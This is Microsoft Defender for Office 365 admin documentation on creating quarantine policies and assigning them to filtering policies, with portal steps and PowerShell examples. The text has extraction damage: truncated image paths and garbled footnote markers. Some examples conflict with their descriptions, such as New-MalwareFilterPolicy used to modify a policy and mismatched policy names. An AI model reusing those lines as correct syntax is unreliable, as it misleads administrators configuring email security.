--- In Microsoft 365 operated by 21Vianet, quarantine isn't currently available in the Microsoft Defender portal. Quarantine is available only in the classic Exchange admin center (classic EAC).--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Quarantine policies** page, use <https://security.microsoft.com/quarantinePolicies>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell). To connect to standalone EOP PowerShell, see [Connect to Exchange Online Protection PowerShell](/powershell/exchange/connect-to-exchange-online-protection-powershell).--- If you change the quarantine policy that's assigned to a supported protection feature, the change affects quarantined message _after_ you make the change. Messages that were quarantined before you made the change aren't affected by the settings of the new quarantine policy assignment.--- How long messages that were quarantined by anti-spam and anti-phishing protection are held before they expire is controlled by the **Retain spam in quarantine for this many days** (_QuarantineRetentionPeriod_) in anti-spam policies. For more information, see the table in [Quarantine retention](quarantine-about.md#quarantine-retention).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](../defender/manage-rbac.md) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)**, or **Security operations/Security Data/Email & collaboration quarantine (manage)**.
- - [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md): Membership in the **Quarantine Administrator**, **Security Administrator**, or **Organization Management** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator** or **Security Administrator** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- All actions taken by admins or users on quarantined messages are audited. For more information about audited quarantine events, see [Quarantine schema in the Office 365 Management API](/office/office-365-management-api/office-365-management-activity-api-schema#quarantine-schema).-
-## Step 1: Create quarantine policies in the Microsoft Defender portal
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Policies & Rules** \> **Threat policies** \> **Quarantine policy** in the **Rules** section. Or, to go directly to the **Quarantine policy** page, use <https://security.microsoft.com/quarantinePolicies>.
-
- :::image type="content" source="../../medio-quarantine-policy-page.png":::
-
-2. On the **Quarantine policies** page, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add custom policy** to start the new quarantine policy wizard.
-
-3. On the **Policy name** page, enter a brief but unique name in the **Policy name** box. The policy name is selectable in dropdown lists in upcoming steps.
-
- When you're finished on the **Policy name** page, select **Next**.
-
-4. On the **Recipient message access** page, select one of the following values:
- - **Limited access**: The individual permissions that are included in this permission group are described in the [Appendix](#appendix) section. Basically, users can do anything to their quarantined messages except release them from quarantine without admin approval.
-
- - **Set specific access (Advanced)**: Use this value to specify custom permissions. Configure the following settings that appear:
- - **Select release action preference**: Select one of the following values from the dropdown list:
- - Blank: Users can't release or request the release of their messages from quarantine. This is the default value.
- - **Allow recipients to request a message to be released from quarantine**
- - **Allow recipients to release a message from quarantine**
- - **Select additional actions recipients can take on quarantined messages**: Select some, all, or none of the following values:
- - **Delete**
- - **Preview**
- - **Block sender**
-
- These permissions and their effect on quarantined messages and in quarantine notifications are described in the [Quarantine policy permission details](#quarantine-policy-permission-details) section later in this article.
-
- When you're finished on the **Recipient message access** page, select **Next**.
-
-5. On the **Quarantine notification** page, select **Enable** to turn on quarantine notifications.
-
- > [!NOTE]
- > If you turn on quarantine notifications for **No access** permissions (on the **Recipient message access** page, you selected **Set specific access (Advanced)** \> **Select release action preference** \> blank), users can view their messages in quarantine, but the only available action for the messages is :::image type="icon" source="../../medi#view-email-message-headers).
-
- When you're finished on the **Quarantine notification** page, select **Next**.
-
-6. On the **Review policy** page, you can review your selections. Select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
- When you're finished on the **Review policy** page, select **Submit**, and then select **Done** in the confirmation page.
-
-7. On the confirmation page that appears, you can use the links to review quarantined messages or go to the **Anti-spam policies** page in the Defender portal.
-
- When you're finished on the page, select **Done**.
-
-Back on the **Quarantine policy** page, the policy that you created is now listed. You're ready to assign the quarantine policy to a supported security feature as described in the [Step 2](#step-2-assign-a-quarantine-policy-to-supported-features) section.
-
-### Create quarantine policies in PowerShell
-
-> [!TIP]
-> The PermissionToAllowSender permission in quarantine policies in PowerShell isn't used.
-
-If you'd rather use PowerShell to create quarantine policies, connect to [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) or [standalone Exchange Online Protection PowerShell](/powershell/exchange/connect-to-exchange-online-protection-powershell) and use the following syntax:
-
-```powershell
-New-QuarantinePolicy -Name "<UniqueName>" -EndUserQuarantinePermissionsValue <0 to 236> [-EsnEnabled $true]
-```
-
-**Notes**:
--- The _ESNEnabled_ parameter with the value `$true` turns on quarantine notifications. Quarantine notifications are turned off by default (the default value is `$false`).--- The _EndUserQuarantinePermissionsValue_ parameter uses a decimal value that's converted from a binary value. The binary value corresponds to the available end-user quarantine permissions in a specific order. For each permission, the value 1 equals True and the value 0 equals False.-
- The required order and values for each individual permission are described in the following table:
-
- |Permission|Decimal value|Binary value|
- ||::|::|
- |PermissionToViewHeader┬╣|128|10000000|
- |PermissionToDownload┬▓|64|01000000|
- |PermissionToAllowSender┬▓|32|00100000|
- |PermissionToBlockSender|16|00010000|
- |PermissionToRequestRelease┬│|8|00001000|
- |PermissionToRelease┬│|4|00000100|
- |PermissionToPreview|2|00000010|
- |PermissionToDelete|1|00000001|
-
- ┬╣ The value 0 for this permission doesn't hide the :::image type="icon" source="../../media/m365-cc-sc-view-message-headers-icon.png" border="false"::: **View message header** action in quarantine. If the message is visible to a user in quarantine, the action is always available for the message.
-
- ┬▓ This permission isn't used (the value 0 or 1 does nothing).
-
- ┬│ Don't set both of these permission values to 1. Set one value to 1 and the other value to 0, or set both values to 0.
-
- For Limited access permissions, the required values are:
-
- |Permission|Limited access|
- ||:--:|
- |PermissionToViewHeader|0|
- |PermissionToDownload|0|
- |PermissionToAllowSender|0|
- |PermissionToBlockSender|1|
- |PermissionToRequestRelease|1|
- |PermissionToRelease|0|
- |PermissionToPreview|1|
- |PermissionToDelete|1|
- |Binary value|00011011|
- |Decimal value to use|27|
--- If you set the _ESNEnabled_ parameter to the value `$true` when the value of the _EndUserQuarantinePermissionsValue_ parameter is 0 (**No access** where all permissions are turned off), users can see their messages in quarantine, but the only available action for the messages is :::image type="icon" source="../../medi#view-email-message-headers).-
-This example creates a new quarantine policy named LimitedAccess with quarantine notifications turned on that assigns the Limited access permissions as described in the previous table.
-
-```powershell
-New-QuarantinePolicy -Name LimitedAccess -EndUserQuarantinePermissionsValue 27 -EsnEnabled $true
-```
-
-For custom permissions, use the previous table to get the binary value that corresponds to the permissions you want. Convert the binary value to a decimal value and use the decimal value for the _EndUserQuarantinePermissionsValue_ parameter. Don't use the binary value.
-
-For detailed syntax and parameter information, see [New-QuarantinePolicy](/powershell/module/exchange/new-quarantinepolicy).
-
-## Step 2: Assign a quarantine policy to supported features
-
-In supported protection features that quarantine email messages, the assigned quarantine policy defines what users can do to quarantine messages and whether quarantine notifications are turned on. Protection features that quarantine messages and whether they support quarantine policies are described in the following table:
-
-|Feature|Quarantine policies supported?|
-||::|
-|**Verdicts in [anti-spam policies](anti-spam-policies-configure.md)**||
-|&nbsp;&nbsp;&nbsp;Spam (_SpamAction_)|Yes (_SpamQuarantineTag_)|
-|&nbsp;&nbsp;&nbsp;High confidence spam (_HighConfidenceSpamAction_)|Yes (_HighConfidenceSpamQuarantineTag_)|
-|&nbsp;&nbsp;&nbsp;Phishing (_PhishSpamAction_)|Yes (_PhishQuarantineTag_)|
-|&nbsp;&nbsp;&nbsp;High confidence phishing (_HighConfidencePhishAction_)|Yes (_HighConfidencePhishQuarantineTag_)|
-|&nbsp;&nbsp;&nbsp;Bulk (_BulkSpamAction_)|Yes (_BulkQuarantineTag_)|
-|**Verdicts in [anti-phishing policies](anti-phishing-policies-about.md)**||
-|&nbsp;&nbsp;&nbsp;Spoof (_AuthenticationFailAction_)|Yes (_SpoofQuarantineTag_)|
-|&nbsp;&nbsp;&nbsp;User impersonation (_TargetedUserProtectionAction_)|Yes (_TargetedUserQuarantineTag_)|
-|&nbsp;&nbsp;&nbsp;Domain impersonation (_TargetedDomainProtectionAction_)|Yes (_TargetedDomainQuarantineTag_)|
-|&nbsp;&nbsp;&nbsp;Mailbox intelligence impersonation (_MailboxIntelligenceProtectionAction_)|Yes (_MailboxIntelligenceQuarantineTag_)|
-|**[Anti-malware policies](anti-malware-policies-configure.md)**|Yes (_QuarantineTag_)|
-|**[Safe Attachments protection](safe-attachments-about.md)**||
-|&nbsp;&nbsp;&nbsp;Email messages with attachments that are quarantined as malware by Safe Attachments policies (_Enable_ and _Action_)|Yes (_QuarantineTag_)|
-|&nbsp;&nbsp;&nbsp;Files that are quarantined as malware by [Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-about.md)|No|
-|**[Exchange mail flow rules](/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules) (also known as transport rules) with the action: 'Deliver the message to the hosted quarantine' (_Quarantine_)**|No|
-
-The default quarantine policies that are used by each protection feature are described in the related tables in [Recommended settings for EOP and Microsoft Defender for Office 365 security](recommended-settings-for-eop-and-office365.md).
-
-The default quarantine policies, preset permission groups, and permissions are described in the [Appendix](#appendix) section at the end of this article.
-
-The rest of this step explains how to assign quarantine policies for supported filter verdicts.
-
-## Assign quarantine policies in supported policies in the Microsoft Defender portal
-
-> [!NOTE]
-> Users can't release their own messages that were quarantined as **malware** by anti-malware or Safe Attachments policies, or as **high confidence phishing** by anti-spam policies, regardless of how the quarantine policy is configured. If the policy allows users to release their own quarantined messages, users are instead allowed to _request_ the release of their quarantined malware or high confidence phishing messages.
-
-### Anti-spam policies
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Policies & rules** \> **Threat policies** \> **Anti-spam** in the **Policies** section. Or, to go directly to the **Anti-spam policies** page, use <https://security.microsoft.com/antispam>.
-
-2. On the **Anti-spam policies** page, use either of the following methods:
- - Select an existing **inbound** anti-spam policy by clicking anywhere in the row other than the check box next to the name. In the policy details flyout that opens, go to the **Actions** section and then select **Edit actions**.
- - Select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create policy**, select **Inbound** from the dropdown list to start the new anti-spam policy wizard, and then get to the **Actions** page.
-
-3. On the **Actions** page or flyout, every verdict that has the **Quarantine message** action selected also has the **Select quarantine policy** box for you to select a quarantine policy.
-
- During the creation of the anti-spam policy, if you _change_ the action of a spam filtering verdict to **Quarantine message**, the **Select quarantine policy** box is blank by default. A blank value means the default quarantine policy for that verdict is used. When you later view or edit the anti-spam policy settings, the quarantine policy name is shown. The default quarantine policies are listed in the [supported features table](#step-2-assign-a-quarantine-policy-to-supported-features).
-
- :::image type="content" source="../../media/quarantine-tags-in-anti-spam-policies.png" alt-text="The Quarantine policy selections in an anti-spam policy" lightbox="../../media/quarantine-tags-in-anti-spam-policies.png":::
-
-Full instructions for creating and modifying anti-spam policies are described in [Configure anti-spam policies in EOP](anti-spam-policies-configure.md).
-
-#### Anti-spam policies in PowerShell
-
-If you'd rather use PowerShell to assign quarantine policies in anti-spam policies, connect to Exchange Online PowerShell or Exchange Online Protection PowerShell and use the following syntax:
-
-```powershell
-<New-HostedContentFilterPolicy -Name "<Unique name>" | Set-HostedContentFilterPolicy -Identity "<Policy name>"> [-SpamAction Quarantine] [-SpamQuarantineTag <QuarantineTagName>] [-HighConfidenceSpamAction Quarantine] [-HighConfidenceSpamQuarantineTag <QuarantineTagName>] [-PhishSpamAction Quarantine] [-PhishQuarantineTag <QuarantineTagName>] [-HighConfidencePhishQuarantineTag <QuarantineTagName>] [-BulkSpamAction Quarantine] [-BulkQuarantineTag <QuarantineTagName>] ...
-```
-
-**Notes**:
--- Quarantine policies matter only when messages are quarantined. The default value for the _HighConfidencePhishAction_ parameter is Quarantine, so you don't need to use that _\*Action_ parameter when you create new spam filter policies in PowerShell. By default, all other _\*Action_ parameters in new spam filter policies aren't set to value Quarantine.-
- To see the important parameter values in existing anti-spam policies, run the following command:
-
- ```powershell
- Get-HostedContentFilterPolicy | Format-List Name,SpamAction,SpamQuarantineTag,HighConfidenceSpamAction,HighConfidenceSpamQuarantineTag,PhishSpamAction,PhishQuarantineTag,HighConfidencePhishAction,HighConfidencePhishQuarantineTag,BulkSpamAction,BulkQuarantineTag
- ```
--- If you create an anti-spam policy without specifying the quarantine policy for the spam filtering verdict, the default quarantine policy for that verdict is used. For information about the default action values and the recommended action values for Standard and Strict, see [EOP anti-spam policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-spam-policy-settings).-
- Specify a different quarantine policy to turn on quarantine notifications or change the default end-user capabilities on quarantined messages for that particular spam filtering verdict.
-
- Users can't release their own messages that were quarantined as high confidence phishing, regardless of how the quarantine policy is configured. If the policy allows users to release their own quarantined messages, users are instead allowed to _request_ the release of their quarantined high confidence phishing messages.
--- In PowerShell, a new anti-spam policy in PowerShell requires a spam filter policy using the **New-HostedContentFilterPolicy** cmdlet (settings), and an exclusive spam filter rule using the **New-HostedContentFilterRule** cmdlet (recipient filters). For instructions, see [Use PowerShell to create anti-spam policies](anti-spam-policies-configure.md#use-powershell-to-create-anti-spam-policies).-
-This example creates a new spam filter policy named Research Department with the following settings:
--- The action for all spam filtering verdicts is set to Quarantine.-- The default quarantine policy named AdminOnlyAccessPolicy that assigns **No access** permissions replaces the default quarantine policy that's used (high confidence phishing messages are quarantined by default and the AdminOnlyAccessPolicy quarantine policy is used by default).-
-```powershell
-New-HostedContentFilterPolicy -Name "Research Department" -SpamAction Quarantine -SpamQuarantineTag AdminOnlyAccessPolicy -HighConfidenceSpamAction Quarantine -HighConfidenceSpamQuarantineTag AdminOnlyAccessPolicy -PhishSpamAction Quarantine -PhishQuarantineTag AdminOnlyAccessPolicy -BulkSpamAction Quarantine -BulkQuarantineTag AdminOnlyAccessPolicy
-```
-
-For detailed syntax and parameter information, see [New-HostedContentFilterPolicy](/powershell/module/exchange/new-hostedcontentfilterpolicy).
-
-This example modifies the existing spam filter policy named Human Resources. The action for the spam quarantine verdict is set to Quarantine, and the custom quarantine policy named ContosoNoAccess is assigned.
-
-```powershell
-Set-HostedContentFilterPolicy -Identity "Human Resources" -SpamAction Quarantine -SpamQuarantineTag ContosoNoAccess
-```
-
-For detailed syntax and parameter information, see [Set-HostedContentFilterPolicy](/powershell/module/exchange/set-hostedcontentfilterpolicy).
-
-### Anti-phishing policies
-
-Spoof intelligence is available in EOP and Defender for Office 365. User impersonation protection, domain impersonation protection, and mailbox intelligence protection are available only in Defender for Office 365. For more information, see [Anti-phishing policies in Microsoft 365](anti-phishing-policies-about.md).
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Policies & rules** \> **Threat policies** \> **Anti-phishing** in the **Policies** section. Or, to go directly to the **Anti-phishing** page, use <https://security.microsoft.com/antiphishing>.
-
-2. On the **Anti-phishing** page, use either of the following methods:
- - Select an existing anti-phishing policy by clicking anywhere in the row other than the check box next to the name. In the policy details flyout that opens, select the **Edit** link in the relevant section as described in the next steps.
- - Select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create** to start the new anti-phishing policy wizard. The relevant pages are described in the next steps.
-
-3. On the **Phishing threshold & protection** page or flyout, verify that the following settings are turned on and configured as required:
- - **Enabled users to protect**: Specify users.
- - **Enabled domains to protect**: Select **Include domains I own** and/or **Include custom domains** and specify the domains.
- - **Enable mailbox intelligence**
- - **Enable intelligence for impersonation protection**
- - **Enable spoof intelligence**
-
-4. On the **Actions** page or flyout, every verdict that has the **Quarantine the message** action also has the **Apply quarantine policy** box for you to select a quarantine policy.
-
- During the creation of the anti-phishing policy, if you don't select a quarantine policy, the default quarantine policy is used. When you later view or edit the anti-phishing policy settings, the quarantine policy name is shown. The default quarantine policies are listed in the [supported features table](#step-2-assign-a-quarantine-policy-to-supported-features).
-
- :::image type="content" source="../../media/quarantine-tags-in-anti-phishing-policies.png" alt-text="The Quarantine policy selections in an anti-phishing policy." lightbox="../../media/quarantine-tags-in-anti-phishing-policies.png":::
-
-Full instructions for creating and modifying anti-phishing policies are available in the following articles:
--- [Configure anti-phishing policies in EOP](anti-phishing-policies-eop-configure.md)-- [Configure anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-mdo-configure.md)-
-#### Anti-phishing policies in PowerShell
-
-If you'd rather use PowerShell to assign quarantine policies in anti-phishing policies, connect to Exchange Online PowerShell or Exchange Online Protection PowerShell and use the following syntax:
-
-```powershell
-<New-AntiPhishPolicy -Name "<Unique name>" | Set-AntiPhishPolicy -Identity "<Policy name>"> [-EnableSpoofIntelligence $true] [-AuthenticationFailAction Quarantine] [-SpoofQuarantineTag <QuarantineTagName>] [-EnableMailboxIntelligence $true] [-EnableMailboxIntelligenceProtection $true] [-MailboxIntelligenceProtectionAction Quarantine] [-MailboxIntelligenceQuarantineTag <QuarantineTagName>] [-EnableOrganizationDomainsProtection $true] [-EnableTargetedDomainsProtection $true] [-TargetedDomainProtectionAction Quarantine] [-TargetedDomainQuarantineTag <QuarantineTagName>] [-EnableTargetedUserProtection $true] [-TargetedUserProtectionAction Quarantine] [-TargetedUserQuarantineTag <QuarantineTagName>] ...
-```
-
-**Notes**:
--- Quarantine policies matter only when messages are quarantined. In anti-phish policies, messages are quarantined when the _Enable\*_ parameter value for the feature is $true **and** the corresponding _*\Action_ parameter value is Quarantine. The default value for the _EnableMailboxIntelligence_ and _EnableSpoofIntelligence_ parameters is $true, so you don't need to use them when you create new anti-phish policies in PowerShell. By default, no _*\Action_ parameters have the value Quarantine.-
- To see the important parameter values in existing anti-phish policies, run the following command:
-
- ```powershell
- Get-AntiPhishPolicy | Format-List EnableSpoofIntelligence,AuthenticationFailAction,SpoofQuarantineTag,EnableTargetedUserProtection,TargetedUserProtectionAction,TargetedUserQuarantineTag,EnableTargetedDomainsProtection,EnableOrganizationDomainsProtection,TargetedDomainProtectionAction,TargetedDomainQuarantineTag,EnableMailboxIntelligence,EnableMailboxIntelligenceProtection,MailboxIntelligenceProtectionAction,MailboxIntelligenceQuarantineTag
- ```
-
- For information about the default and recommended action values for Standard and Strict configurations, see [EOP anti-phishing policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-phishing-policy-settings) and [Impersonation settings in anti-phishing policies in Microsoft Defender for Office 365](recommended-settings-for-eop-and-office365.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).
--- If you create a new anti-phishing policy without specifying the quarantine policy for the anti-phishing action, the default quarantine policy for that action is used. The default quarantine policies for each anti-phishing action are shown in [EOP anti-phishing policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-phishing-policy-settings) and [Anti-phishing policy settings in Microsoft Defender for Office 365](recommended-settings-for-eop-and-office365.md#anti-phishing-policy-settings-in-microsoft-defender-for-office-365).-
- Specify a different quarantine policy only if you want to change the default end-user capabilities on quarantined messages for that particular anti-phishing action.
--- A new anti-phishing policy in PowerShell requires an anti-phish policy using the **New-AntiPhishPolicy** cmdlet (settings), and an exclusive anti-phish rule using the **New-AntiPhishRule** cmdlet (recipient filters). For instructions, see the following articles:
- - [Use PowerShell to configure anti-phishing policies in EOP](anti-phishing-policies-eop-configure.md#use-exchange-online-powershell-to-configure-anti-phishing-policies)
- - [Use Exchange Online PowerShell to configure anti-phishing policies](anti-phishing-policies-mdo-configure.md#use-exchange-online-powershell-to-configure-anti-phishing-policies)
-
-This example creates a new anti-phish policy named Research Department with the following settings:
--- The action for all spam filtering verdicts is set to Quarantine.-- The default quarantine policy named AdminOnlyAccessPolicy that assigns **No access** permissions replaces the default quarantine policy that's used.-
-```powershell
-New-AntiPhishPolicy -Name "Research Department" -AuthenticationFailAction Quarantine -SpoofQuarantineTag NoAccess -EnableMailboxIntelligenceProtection $true -MailboxIntelligenceProtectionAction Quarantine -MailboxIntelligenceQuarantineTag NoAccess -EnableOrganizationDomainsProtection $true -EnableTargetedDomainsProtection $true -TargetedDomainProtectionAction Quarantine -TargetedDomainQuarantineTag NoAccess -EnableTargetedUserProtection $true -TargetedUserProtectionAction Quarantine -TargetedUserQuarantineTag NoAccess
-```
-
-For detailed syntax and parameter information, see [New-AntiPhishPolicy](/powershell/module/exchange/new-antiphishpolicy).
-
-This example modifies the existing anti-phish policy named Human Resources. The action for messages detected by user impersonation and domain impersonation is set to Quarantine, and the custom quarantine policy named ContosoNoAccess is assigned.
-
-```powershell
-Set-AntiPhishPolicy -Identity "Human Resources" -EnableTargetedDomainsProtection $true -TargetedDomainProtectionAction Quarantine -TargetedDomainQuarantineTag ContosoNoAccess -EnableTargetedUserProtection $true -TargetedUserProtectionAction Quarantine -TargetedUserQuarantineTag ContosoNoAccess
-```
-
-For detailed syntax and parameter information, see [Set-AntiPhishPolicy](/powershell/module/exchange/set-antiphishpolicy).
-
-### Anti-malware policies
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Policies & rules** \> **Threat policies** \> **Anti-malware** in the **Policies** section. Or, to go directly to the **Anti-malware** page, use <https://security.microsoft.com/antimalwarev2>.
-
-2. On the **Anti-malware** page, use either of the following methods:
- - Select an existing anti-malware policy by clicking anywhere in the row other than the check box next to the name. In the policy details flyout that opens, go to the **Protection settings** section, and then select **Edit protection settings**.
- - Select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create** to start the new anti-malware policy wizard and get to the **Protection settings** page.
-
-3. On the **Protection settings** page or flyout, view or select a quarantine policy in the **Quarantine policy** box.
-
- Quarantine notifications are disabled in the policy named AdminOnlyAccessPolicy. To notify recipients that have messages quarantined as malware, create or use an existing quarantine policy where quarantine notifications are turned on. For instructions, see [Create quarantine policies in the Microsoft Defender portal](quarantine-policies.md#step-1-create-quarantine-policies-in-the-microsoft-defender-portal).
-
- Users can't release their own messages that were quarantined as malware by anti-malware policies, regardless of how the quarantine policy is configured. If the policy allows users to release their own quarantined messages, users are instead allowed to _request_ the release of their quarantined malware messages.
-
- :::image type="content" source="../../media/quarantine-tags-in-anti-malware-policies.png" alt-text="The Quarantine policy selections in an anti-malware policy." lightbox="../../media/quarantine-tags-in-anti-malware-policies.png":::
-
-Full instructions for creating and modifying anti-malware policies are available in [Configure anti-malware policies](anti-malware-policies-configure.md).
-
-#### Anti-malware policies in PowerShell
-
-If you'd rather use PowerShell to assign quarantine policies in anti-malware policies, connect to Exchange Online PowerShell or Exchange Online Protection PowerShell and use the following syntax:
-
-```powershell
-<New-AntiMalwarePolicy -Name "<Unique name>" | Set-AntiMalwarePolicy -Identity "<Policy name>"> [-QuarantineTag <QuarantineTagName>]
-```
-
-**Notes**:
--- When you create new anti-malware policies without using the _QuarantineTag_ parameter, the default quarantine policy named AdminOnlyAccessPolicy is used.-
- Users can't release their own messages that were quarantined as malware, regardless of how the quarantine policy is configured. If the policy allows users to release their own quarantined messages, users are instead allowed to _request_ the release of their quarantined malware messages.
-
- To see the important parameter values in existing anti-phish policies, run the following command:
-
- ```powershell
- Get-MalwareFilterPolicy | Format-Table Name,QuarantineTag
- ```
--- A new anti-malware policy in PowerShell requires a malware filter policy using the **New-MalwareFilterPolicy** cmdlet (settings), and an exclusive malware filter rule using the **New-MalwareFilterRule** cmdlet (recipient filters). For instructions, see [Use Exchange Online PowerShell or standalone EOP PowerShell to configure anti-malware policies](anti-malware-policies-configure.md#use-exchange-online-powershell-or-standalone-eop-powershell-to-configure-anti-malware-policies).-
-This example creates a malware filter policy named Research Department that uses the custom quarantine policy named ContosoNoAccess that assigns **No access** permissions to the quarantined messages.
-
-```powershell
-New-MalwareFilterPolicy -Name "Research Department" -QuarantineTag ContosoNoAccess
-```
-
-For detailed syntax and parameter information, see [New-MalwareFilterPolicy](/powershell/module/exchange/new-malwarefilterpolicy).
-
-This example modifies the existing malware filter policy named Human Resources to use the custom quarantine policy named ContosoNoAccess that assigns **No access** permissions to the quarantined messages.
-
-```powershell
-New-MalwareFilterPolicy -Identity "Human Resources" -QuarantineTag ContosoNoAccess
-```
-
-For detailed syntax and parameter information, see [Set-MalwareFilterPolicy](/powershell/module/exchange/set-malwarefilterpolicy).
-
-### Safe Attachments policies in Defender for Office 365
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Policies & rules** \> **Threat policies** \> **Safe Attachments** in the **Policies** section. Or, to go directly to the **Safe Attachments** page, use <https://security.microsoft.com/safeattachmentv2>.
-
-2. On the **Safe Attachments** page, use either of the following methods:
- - Select an existing Safe Attachments policy by clicking anywhere in the row other than the check box next to the name. In the policy details flyout that opens, select the **Edit settings** link in **Settings** section.
- - Select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create** to start the new Safe Attachments policy wizard and get to the **Settings** page.
-
-3. On the **Settings** page or flyout, view or select a quarantine policy in the **Quarantine policy** box.
-
- Users can't release their own messages that were quarantined as malware by Safe Attachments policies, regardless of how the quarantine policy is configured. If the policy allows users to release their own quarantined messages, users are instead allowed to _request_ the release of their quarantined malware messages.
-
- :::image type="content" source="../../media/quarantine-tags-in-safe-attachments-policies.png" alt-text="The Quarantine policy selections in a Safe Attachments policy." lightbox="../../media/quarantine-tags-in-safe-attachments-policies.png":::
-
-Full instructions for creating and modifying Safe Attachments policies are described in [Set up Safe Attachments policies in Microsoft Defender for Office 365](safe-attachments-policies-configure.md).
-
-#### Safe Attachments policies in PowerShell
-
-If you'd rather use PowerShell to assign quarantine policies in Safe Attachments policies, connect to Exchange Online PowerShell or Exchange Online Protection PowerShell and use the following syntax:
-
-```powershell
-<New-SafeAttachmentPolicy -Name "<Unique name>" | Set-SafeAttachmentPolicy -Identity "<Policy name>"> -Enable $true -Action <Block | DynamicDelivery> [-QuarantineTag <QuarantineTagName>]
-```
-
-**Notes**:
--- The _Action_ parameter values Block or DynamicDelivery can result in quarantined messages (the value Allow doesn't quarantine messages). The value of the _Action_ parameter in meaningful only when the value of the _Enable_ parameter is `$true`.--- When you create new Safe Attachments policies without using the _QuarantineTag_ parameter, the default quarantine policy named AdminOnlyAccessPolicy is used for malware detections by Safe Attachments.-
- Users can't release their own messages that were quarantined as malware, regardless of how the quarantine policy is configured. If the policy allows users to release their own quarantined messages, users are instead allowed to _request_ the release of their quarantined malware messages.
-
- To see the important parameter values, run the following command:
-
- ```powershell
- Get-SafeAttachmentPolicy | Format-List Name,Enable,Action,QuarantineTag
- ```
--- A new Safe Attachments policy in PowerShell requires a safe attachment policy using the **New-SafeAttachmentPolicy** cmdlet (settings), and an exclusive safe attachment rule using the **New-SafeAttachmentRule** cmdlet (recipient filters). For instructions, see [Use Exchange Online PowerShell to configure Safe Attachments policies](safe-attachments-policies-configure.md#use-exchange-online-powershell-to-configure-safe-attachments-policies).-
-This example creates a safe attachment policy named Research Department that blocks detected messages and uses the custom quarantine policy named ContosoNoAccess that assigns **No access** permissions to the quarantined messages.
-
-```powershell
-New-SafeAttachmentPolicy -Name "Research Department" -Enable $true -Action Block -QuarantineTag NoAccess
-```
-
-For detailed syntax and parameter information, see [New-MalwareFilterPolicy](/powershell/module/exchange/new-malwarefilterpolicy).
-
-This example modifies the existing safe attachment policy named Human Resources to use the custom quarantine policy named ContosoNoAccess that assigns **No access** permissions.
-
-```powershell
-Set-SafeAttachmentPolicy -Identity "Human Resources" -QuarantineTag ContosoNoAccess
-```
-
-For detailed syntax and parameter information, see [Set-MalwareFilterPolicy](/powershell/module/exchange/set-malwarefilterpolicy).
-
-## Configure global quarantine notification settings in the Microsoft Defender portal
-
-The global settings for quarantine policies allow you to customize the quarantine notifications that are sent to recipients of quarantined messages if quarantine notifications are turned on in the quarantine policy. For more information about quarantine notifications, see [Quarantine notifications](quarantine-quarantine-notifications.md).
-
-### Customize quarantine notifications for different languages
-
-The message body of quarantine notifications is already localized based on the language setting of the recipient's cloud-based mailbox.
-
-You can use the procedures in this section to customize the **Sender display name**, **Subject**, and **Disclaimer** values that are used in quarantine notifications based on the language setting of the recipient's cloud-based mailbox:
--- The **Sender display name** as shown in the following screenshot:-
- :::image type="content" source="../../media/quarantine-tags-esn-customization-display-name.png" alt-text="A customized sender display name in a quarantine notification." lightbox="../../media/quarantine-tags-esn-customization-display-name.png":::
--- The **Subject** field of quarantine notification messages.--- The **Disclaimer** text that's added to the bottom of quarantine notifications. The localized text, **A disclaimer from your organization:** is always included first, followed by the text you specify as show in the following screenshot:--
-> [!TIP]
-> Quarantine notifications aren't localized for on-premises mailboxes.
->
-> A custom quarantine notification for a specific language is shown to users only when their mailbox language matches the language in the custom quarantine notification.
->
-> The value **English_USA** applies only to US English clients. The value **English_Great Britain** applies to all other English clients (Great Britain, Canada, Australia, etc.).
->
-> The languages **Norwegian** and **Norwegian (Nynorsk)** are available. Norwegian (Bokmål) isn't available.
-
-To create customized quarantine notifications for up to three languages, do the following steps:
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Policies & rules** \> **Threat policies** \> **Quarantine policies** in the **Rules** section. Or, to go directly to the **Quarantine policies** page, use <https://security.microsoft.com/quarantinePolicies>.
-
-2. On the **Quarantine policies** page, select :::image type="icon" source="../../media/m365-cc-sc-gear-icon.png" border="false"::: **Global settings**.
-
-3. In the **Quarantine notification settings** flyout that opens, do the following steps:
-
- 1. Select the language from the **Choose language** box. The default value is **English_USA**.
-
- Although this box isn't the first setting, you need to configure it first. If you enter values in the **Sender display name**, **Subject**, or **Disclaimer** boxes before you select the language, those values disappear.
-
- 2. After you select the language, enter values for **Sender display name**, **Subject**, and **Disclaimer**. The values must be unique for each language. If you try to reuse a value in a different language, you'll get an error when you select **Save**.
-
- 3. Select the **Add** button near the **Choose language** box.
-
